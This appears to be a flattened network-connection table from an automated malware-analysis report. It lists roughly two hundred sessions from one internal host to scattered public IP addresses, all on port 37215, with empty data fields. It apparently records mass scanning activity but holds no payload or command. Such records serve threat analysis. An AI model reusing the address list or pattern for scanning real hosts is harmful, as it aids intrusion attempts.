                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21231192.168.2.1552766197.36.184.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21232192.168.2.1535474156.1.60.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21233192.168.2.1556942138.216.250.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21234192.168.2.155569494.45.0.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21235192.168.2.1553984157.21.253.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21236192.168.2.155412631.117.163.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21237192.168.2.1538332138.228.247.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21238192.168.2.155029641.99.174.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21239192.168.2.1550358102.103.59.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21240192.168.2.155350641.56.141.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21241192.168.2.1557488186.108.124.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21242192.168.2.1544674157.23.21.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21243192.168.2.1536050181.79.154.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21244192.168.2.155758645.246.145.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21245192.168.2.1539852190.219.85.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21246192.168.2.1536948190.229.186.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21247192.168.2.1535596190.251.137.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21248192.168.2.1539382186.233.240.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21249192.168.2.1553678190.43.204.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21250192.168.2.156086041.142.227.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21251192.168.2.154597431.194.0.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21252192.168.2.1557746186.87.0.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21253192.168.2.1553258156.7.168.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21254192.168.2.154616894.175.34.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21255192.168.2.155113431.218.89.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21256192.168.2.1541316122.159.241.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21257192.168.2.154847094.208.161.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21258192.168.2.1536562157.159.26.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21259192.168.2.1553872102.62.54.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21260192.168.2.1559436138.157.51.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21261192.168.2.1537932222.205.140.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21262192.168.2.1547862152.244.125.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21263192.168.2.1560930138.14.135.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21264192.168.2.153566248.100.10.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21265192.168.2.1540822181.15.24.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21266192.168.2.1549434102.167.2.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21267192.168.2.1544010122.18.178.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21268192.168.2.1550986190.169.23.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21269192.168.2.1551292190.160.5.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21270192.168.2.1535492121.184.236.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21271192.168.2.1558344122.27.132.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21272192.168.2.1556462190.135.160.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21273192.168.2.1548696102.164.25.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21274192.168.2.154762494.91.250.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21275192.168.2.1553600102.126.142.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21276192.168.2.1541484102.86.236.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21277192.168.2.1549644156.11.239.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21278192.168.2.154404894.39.99.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21279192.168.2.154049645.188.17.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21280192.168.2.1533868156.53.194.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21281192.168.2.1535050121.125.52.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21282192.168.2.1534694138.95.128.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21283192.168.2.1545124138.16.89.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21284192.168.2.154144431.217.22.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21285192.168.2.155618831.144.123.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21286192.168.2.1540952157.203.184.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21287192.168.2.1540558122.201.131.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21288192.168.2.1535708181.201.32.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21289192.168.2.1543756186.58.214.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21290192.168.2.154034845.193.231.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21291192.168.2.1559890157.147.220.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21292192.168.2.155813094.154.71.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21293192.168.2.1555200222.157.224.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21294192.168.2.154431837.185.166.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21295192.168.2.153852441.81.164.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21296192.168.2.1550792102.187.45.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21297192.168.2.1542242197.112.45.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21298192.168.2.155644241.159.242.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21299192.168.2.1549418186.176.192.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21300192.168.2.1540358122.36.207.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21301192.168.2.153335637.121.55.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21302192.168.2.154272431.124.138.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21303192.168.2.1534014186.240.64.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21304192.168.2.1547442157.32.241.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21305192.168.2.154703037.36.57.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21306192.168.2.1540258186.103.7.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21307192.168.2.154552045.20.105.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21308192.168.2.153374431.28.211.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21309192.168.2.154921445.250.208.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21310192.168.2.155034087.106.175.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21311192.168.2.154536641.112.254.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21312192.168.2.1551868222.89.222.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21313192.168.2.1535772186.48.65.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21314192.168.2.1559582156.3.51.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21315192.168.2.1542602222.61.9.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21316192.168.2.1550018102.39.126.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21317192.168.2.1558020128.19.104.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21318192.168.2.1548148102.110.2.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21319192.168.2.1559140197.37.39.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21320192.168.2.1556544156.150.186.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21321192.168.2.1560250122.45.231.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21322192.168.2.1543556157.34.27.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21323192.168.2.1557574190.128.131.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21324192.168.2.155516037.101.237.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21325192.168.2.1539590102.134.86.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21326192.168.2.1536344102.206.201.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21327192.168.2.1540892109.137.244.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21328192.168.2.1555948156.41.181.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21329192.168.2.1535472102.130.154.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21330192.168.2.153419245.83.19.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21331192.168.2.153836841.41.192.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21332192.168.2.1544686181.255.131.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21333192.168.2.155904031.191.242.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21334192.168.2.1550622102.84.111.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21335192.168.2.1549588157.126.231.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21336192.168.2.1541042197.110.89.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21337192.168.2.1544526102.62.218.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21338192.168.2.1553400222.35.120.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21339192.168.2.1539238122.33.81.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21340192.168.2.1540230138.83.99.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21341192.168.2.1544238157.236.18.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21342192.168.2.1552792121.201.134.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21343192.168.2.1538574222.71.31.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21344192.168.2.154626431.101.129.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21345192.168.2.153279681.51.245.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21346192.168.2.1555508122.18.99.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21347192.168.2.1533730209.93.71.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21348192.168.2.1537962190.22.158.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21349192.168.2.1551488121.57.244.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21350192.168.2.155633894.180.43.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21351192.168.2.1552880190.96.204.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21352192.168.2.1540676102.244.186.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21353192.168.2.1542026222.39.252.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21354192.168.2.153335094.88.101.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21355192.168.2.1544246164.35.62.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21356192.168.2.1534034157.124.191.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21357192.168.2.1560556222.235.223.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21358192.168.2.1554112102.4.107.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21359192.168.2.1543148102.187.68.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21360192.168.2.1557300121.232.73.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21361192.168.2.1537386108.62.42.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21362192.168.2.1543918122.170.168.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21363192.168.2.1560316222.62.36.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21364192.168.2.154711841.148.89.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21365192.168.2.1547922181.252.43.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21366192.168.2.1556254197.121.79.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21367192.168.2.1538930102.70.244.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21368192.168.2.154329641.49.48.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21369192.168.2.1535626222.51.188.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21370192.168.2.155686041.38.219.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21371192.168.2.1548710122.51.10.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21372192.168.2.1547112157.41.131.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21373192.168.2.154846637.233.210.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21374192.168.2.153929694.211.187.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21375192.168.2.154673045.214.111.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21376192.168.2.1544930102.254.108.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21377192.168.2.154651445.225.34.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21378192.168.2.154154637.156.39.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21379192.168.2.153358037.208.156.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21380192.168.2.155809241.115.87.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21381192.168.2.153367894.13.188.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21382192.168.2.1558820190.171.66.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21383192.168.2.1554576138.126.16.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21384192.168.2.154815637.41.37.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21385192.168.2.154649431.193.90.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21386192.168.2.1542012102.226.157.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21387192.168.2.155191837.243.33.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21388192.168.2.1552648222.223.194.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21389192.168.2.1551088181.191.208.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21390192.168.2.154614631.231.223.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21391192.168.2.153917037.231.27.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21392192.168.2.154878631.27.146.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21393192.168.2.1558340102.140.47.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21394192.168.2.1536376138.9.255.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21395192.168.2.1546590222.56.94.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21396192.168.2.153967645.42.137.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21397192.168.2.155193869.247.158.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21398192.168.2.1548240181.167.26.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21399192.168.2.155715037.138.196.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21400192.168.2.153521431.195.104.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21401192.168.2.1539792138.208.203.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21402192.168.2.1554120138.76.106.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21403192.168.2.1549154181.123.47.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21404192.168.2.153810631.214.29.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21405192.168.2.154812045.89.98.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21406192.168.2.1550982222.129.175.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21407192.168.2.1556056156.227.102.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21408192.168.2.1554978121.222.172.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21409192.168.2.1560850186.0.182.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21410192.168.2.1534862102.231.242.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21411192.168.2.154399645.221.58.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21412192.168.2.1545322186.189.134.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21413192.168.2.1559838186.119.85.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21414192.168.2.1545132122.0.248.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21415192.168.2.1559846138.21.11.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21416192.168.2.1543816186.175.255.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21417192.168.2.1555600129.122.230.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21418192.168.2.1537034222.79.64.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21419192.168.2.153297841.127.80.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21420192.168.2.1551712190.231.169.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21421192.168.2.1549086181.182.38.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21422192.168.2.154493037.163.156.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21423192.168.2.154706094.157.161.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21424192.168.2.1554744157.137.213.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21425192.168.2.153473845.48.162.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21426192.168.2.1552174122.176.100.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21427192.168.2.1532798156.74.102.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21428192.168.2.1550410157.52.207.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21429192.168.2.153985645.142.175.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21430192.168.2.1539098156.128.76.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21431192.168.2.153781494.11.242.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21432192.168.2.1548108121.44.0.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21433192.168.2.1538634157.133.133.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21434192.168.2.1534280121.101.212.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21435192.168.2.1551668181.234.85.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21436192.168.2.1543072100.39.144.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21437192.168.2.1548586121.19.94.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21438192.168.2.154421041.155.56.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21439192.168.2.153292837.137.183.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21440192.168.2.1556424145.147.127.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21441192.168.2.1548962122.154.55.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21442192.168.2.1544120181.69.37.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21443192.168.2.156078862.216.117.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21444192.168.2.155872094.177.45.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21445192.168.2.153697675.200.131.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21446192.168.2.1544488138.88.199.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21447192.168.2.1545236190.217.202.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21448192.168.2.1534696186.183.168.17537215
                                              TimestampBytes transferredDirectionData


